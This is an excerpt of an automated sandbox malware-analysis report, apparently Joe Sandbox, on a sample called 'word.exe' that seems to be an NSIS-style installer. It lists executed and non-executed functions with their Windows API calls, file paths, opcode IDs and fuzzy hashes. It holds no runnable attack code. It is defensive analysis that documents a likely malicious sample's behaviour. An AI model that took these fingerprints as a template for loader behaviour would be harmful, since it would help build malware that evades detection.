                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7dec09a748792e581ac56a4790c1b6395b646ad41e7ca9f7da80e9268b46833e
                                          • Instruction ID: 178f069459afe4b8f6f8f854f87fc4d5347ab2ec506c5a0858b6a976d85c5aaa
                                          • Opcode Fuzzy Hash: 7dec09a748792e581ac56a4790c1b6395b646ad41e7ca9f7da80e9268b46833e
                                          • Instruction Fuzzy Hash: 8E816871E00228CFDF24DFA8C8447ADBBB1FB45301F25816AD816BB281C7785A96DF44
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00406025 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2a04bb56d33b9fd45abb4b0c1bf3f4372dafe23577b3b22b72e760c40e3ad783
                                          • Instruction ID: b8f14fa8ad5cea51b2b9a2e46606c418b7244df3771cf842608f3b99def8c173
                                          • Opcode Fuzzy Hash: 2a04bb56d33b9fd45abb4b0c1bf3f4372dafe23577b3b22b72e760c40e3ad783
                                          • Instruction Fuzzy Hash: A3818731E00228CFDF24DFA8C8447ADBBB1FB45305F21816AD956BB281C7785A96DF44
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00406473 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 17d2eea9f7cdce8bc4a623307af2d8c55e83d6c30150793070c9d330b5787031
                                          • Instruction ID: ed496f49c15cb1a0cee1f91230a4d4bd76d3fd25087baa69d2252d5f7e71f344
                                          • Opcode Fuzzy Hash: 17d2eea9f7cdce8bc4a623307af2d8c55e83d6c30150793070c9d330b5787031
                                          • Instruction Fuzzy Hash: 30713271E00228CFDF28DFA8C8547ADBBB1FB44305F15806AD906BB281D7785A96DF44
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00406591 Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 61519280ecd7fef69977b9b053ed39a1e65b41a016af8b99da7ecabe5fea5e13
                                          • Instruction ID: c4674237f5282a099a09cde02a4657600336f9fef0cdfe8d994bfdecfa790225
                                          • Opcode Fuzzy Hash: 61519280ecd7fef69977b9b053ed39a1e65b41a016af8b99da7ecabe5fea5e13
                                          • Instruction Fuzzy Hash: 4A714671E00228CFDF28DFA8C8547ADBBB1FB44301F15816AD916BB281C7785A96DF44
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004064DD Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a35431ca5ac5a63de0c48c0fa1b7027ef1301f6ad8cfe25f67b835d71510927c
                                          • Instruction ID: 5a6a632b4197b5bad3eb6902eefc8e88da0621a447eca7476662d6aa47a1fed0
                                          • Opcode Fuzzy Hash: a35431ca5ac5a63de0c48c0fa1b7027ef1301f6ad8cfe25f67b835d71510927c
                                          • Instruction Fuzzy Hash: 93714571E00228CFEF28DF98C8547ADBBB1FB44305F15816AD916BB281C7789A56DF44
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401E38 Relevance: 4.5, APIs: 3, Instructions: 48synchronizationCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00404E84: lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                                            • Part of subcall function 00404E84: lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                                            • Part of subcall function 00404E84: lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                                            • Part of subcall function 00404E84: SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                                            • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F18
                                            • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F32
                                            • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F40
                                            • Part of subcall function 004053F8: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00422540,Error launching installer), ref: 0040541D
                                            • Part of subcall function 004053F8: CloseHandle.KERNEL32(?), ref: 0040542A
                                          • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E72
                                          • GetExitCodeProcess.KERNELBASE(?,?), ref: 00401E82
                                          • CloseHandle.KERNEL32(?), ref: 00401EA7
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                                          • String ID:
                                          • API String ID: 3521207402-0
                                          • Opcode ID: fee99b61f809a53683fc29f07b08f3b8ec53ffd30f17739a64443d1dd851e78e
                                          • Instruction ID: 9f74951c8685777ff7248368b05c14b320234156a546818c44ddf0e00d329478
                                          • Opcode Fuzzy Hash: fee99b61f809a53683fc29f07b08f3b8ec53ffd30f17739a64443d1dd851e78e
                                          • Instruction Fuzzy Hash: F0015731E04205EBCF21AFA1D984AAE7A71EF00344F54813BF905B61E1C7BC4A41EB9A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          • Opcode ID: 3f695f75208f640be867956647b5e414a31c5be601b183f87834ddd8f53d2100
                                          • Instruction ID: 9ae17229e6d33b90ed82c987c6c55cbce7d6b2b41e99f766f3e5bcfc28262e64
                                          • Opcode Fuzzy Hash: 3f695f75208f640be867956647b5e414a31c5be601b183f87834ddd8f53d2100
                                          • Instruction Fuzzy Hash: CA014472B242109BEB184B389C04B2A32A8E710319F10813BF841F72F1D638CC028B4D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405F28 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                          • GetProcAddress.KERNEL32(00000000,?,?,?,00403165,0000000D), ref: 00405F55
                                            • Part of subcall function 00405EBA: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405ED1
                                            • Part of subcall function 00405EBA: wsprintfA.USER32 ref: 00405F0A
                                            • Part of subcall function 00405EBA: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F1E
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                          • String ID:
                                          • API String ID: 2547128583-0
                                          • Opcode ID: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
                                          • Instruction ID: ae0a47d2ae808e9ad23d4e83699500a4151a320e34d6f574464110b7e3b32053
                                          • Opcode Fuzzy Hash: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
                                          • Instruction Fuzzy Hash: 7AE08632A0951176D61097709D0496773ADDAC9740300087EF659F6181D738AC119E6D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040586F Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\user\AppData\Roaming\word.exe,80000000,00000003), ref: 00405873
                                          • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405895
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: File$AttributesCreate
                                          • String ID:
                                          • API String ID: 415043291-0
                                          • Opcode ID: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
                                          • Instruction ID: e615d4ce70e2a600ad3370b8a7bf294de68ab1b424622093f8f4c5f34a5113e1
                                          • Opcode Fuzzy Hash: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
                                          • Instruction Fuzzy Hash: D5D09E31658301AFEF098F20DD1AF2EBBA2EB84B01F10962CB646940E0D6715C59DB16
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403511 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 11COMMON
                                          Download Yara Rule
                                          APIs
                                          • CloseHandle.KERNELBASE(FFFFFFFF), ref: 0040351C
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\nso8B21.tmp\, xrefs: 00403530
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID: C:\Users\user\AppData\Local\Temp\nso8B21.tmp\
                                          • API String ID: 2962429428-2245220532
                                          • Opcode ID: 69a1ec42bfd2c808f6210beb952dd846253a51cc7dcbdee1183c199696e0200a
                                          • Instruction ID: d56dd6d0e9358e7abe0e1c75cf4fb1a02b43fa7986872cd818a2a6dcef25a25f
                                          • Opcode Fuzzy Hash: 69a1ec42bfd2c808f6210beb952dd846253a51cc7dcbdee1183c199696e0200a
                                          • Instruction Fuzzy Hash: 07C0123090860466D2207F78AE0B7053B58A741336B900725F174B00F2D73C6A41556E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405850 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileAttributesA.KERNELBASE(?,0040565B,?,?,?), ref: 00405854
                                          • SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405866
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
                                          • Instruction ID: 81e3be7da977fa0fdb855dbc2a497946ad1e8e9610c44c99cc48e92da118c7e0
                                          • Opcode Fuzzy Hash: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
                                          • Instruction Fuzzy Hash: C2C00271808501AAD6016B34EE0D81F7B66EB54321B148B25F469A01F0C7315C66DA2A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004053C3 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateDirectoryA.KERNELBASE(?,00000000,004030EE,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 004053C9
                                          • GetLastError.KERNEL32 ref: 004053D7
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: CreateDirectoryErrorLast
                                          • String ID:
                                          • API String ID: 1375471231-0
                                          • Opcode ID: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                          • Instruction ID: 6b45de36f316d487aa01e9413b839baa5bb3cf32c01ac4838d60d751b980a7e6
                                          • Opcode Fuzzy Hash: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                          • Instruction Fuzzy Hash: E0C04C30619642DBD7105B31ED08B177E60EB50781F208935A506F11E0D6B4D451DD3E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403081 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF), ref: 00403098
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
                                          • Instruction ID: e4cef5105026143dd13b930ce46becb45ea6c66ba88fb4286e933b642882ba15
                                          • Opcode Fuzzy Hash: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
                                          • Instruction Fuzzy Hash: F3E08631211118FBDF209E51EC00A973B9CDB04362F008032B904E5190D538DA10DBA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004030B3 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E1C,0000E9E4), ref: 004030C1
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: FilePointer
                                          • String ID:
                                          • API String ID: 973152223-0
                                          • Opcode ID: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
                                          • Instruction ID: aafe5e0ddee8b519ffd98e4e857b28c3b9165386d483fecacc2863ad1570d206
                                          • Opcode Fuzzy Hash: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
                                          • Instruction Fuzzy Hash: D6B01231544200BFDB214F00DF06F057B21B79C701F208030B340380F082712430EB1E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 00404FC2 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278windowclipboardmemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDlgItem.USER32(?,00000403), ref: 00405021
                                          • GetDlgItem.USER32(?,000003EE), ref: 00405030
                                          • GetClientRect.USER32 ref: 0040506D
                                          • GetSystemMetrics.USER32 ref: 00405075
                                          • SendMessageA.USER32 ref: 00405096
                                          • SendMessageA.USER32 ref: 004050A7
                                          • SendMessageA.USER32 ref: 004050BA
                                          • SendMessageA.USER32 ref: 004050C8
                                          • SendMessageA.USER32 ref: 004050DB
                                          • ShowWindow.USER32(00000000,?), ref: 004050FD
                                          • ShowWindow.USER32(?,00000008), ref: 00405111
                                          • GetDlgItem.USER32(?,000003EC), ref: 00405132
                                          • SendMessageA.USER32 ref: 00405142
                                          • SendMessageA.USER32 ref: 0040515B
                                          • SendMessageA.USER32 ref: 00405167
                                          • GetDlgItem.USER32(?,000003F8), ref: 0040503F
                                            • Part of subcall function 00403E89: SendMessageA.USER32 ref: 00403E97
                                          • GetDlgItem.USER32(?,000003EC), ref: 00405184
                                          • CreateThread.KERNEL32(00000000,00000000,Function_00004F56,00000000), ref: 00405192
                                          • CloseHandle.KERNEL32(00000000), ref: 00405199
                                          • ShowWindow.USER32(00000000), ref: 004051BD
                                          • ShowWindow.USER32(00000000,00000008), ref: 004051C2
                                          • ShowWindow.USER32(00000008), ref: 00405209
                                          • SendMessageA.USER32 ref: 0040523B
                                          • CreatePopupMenu.USER32 ref: 0040524C
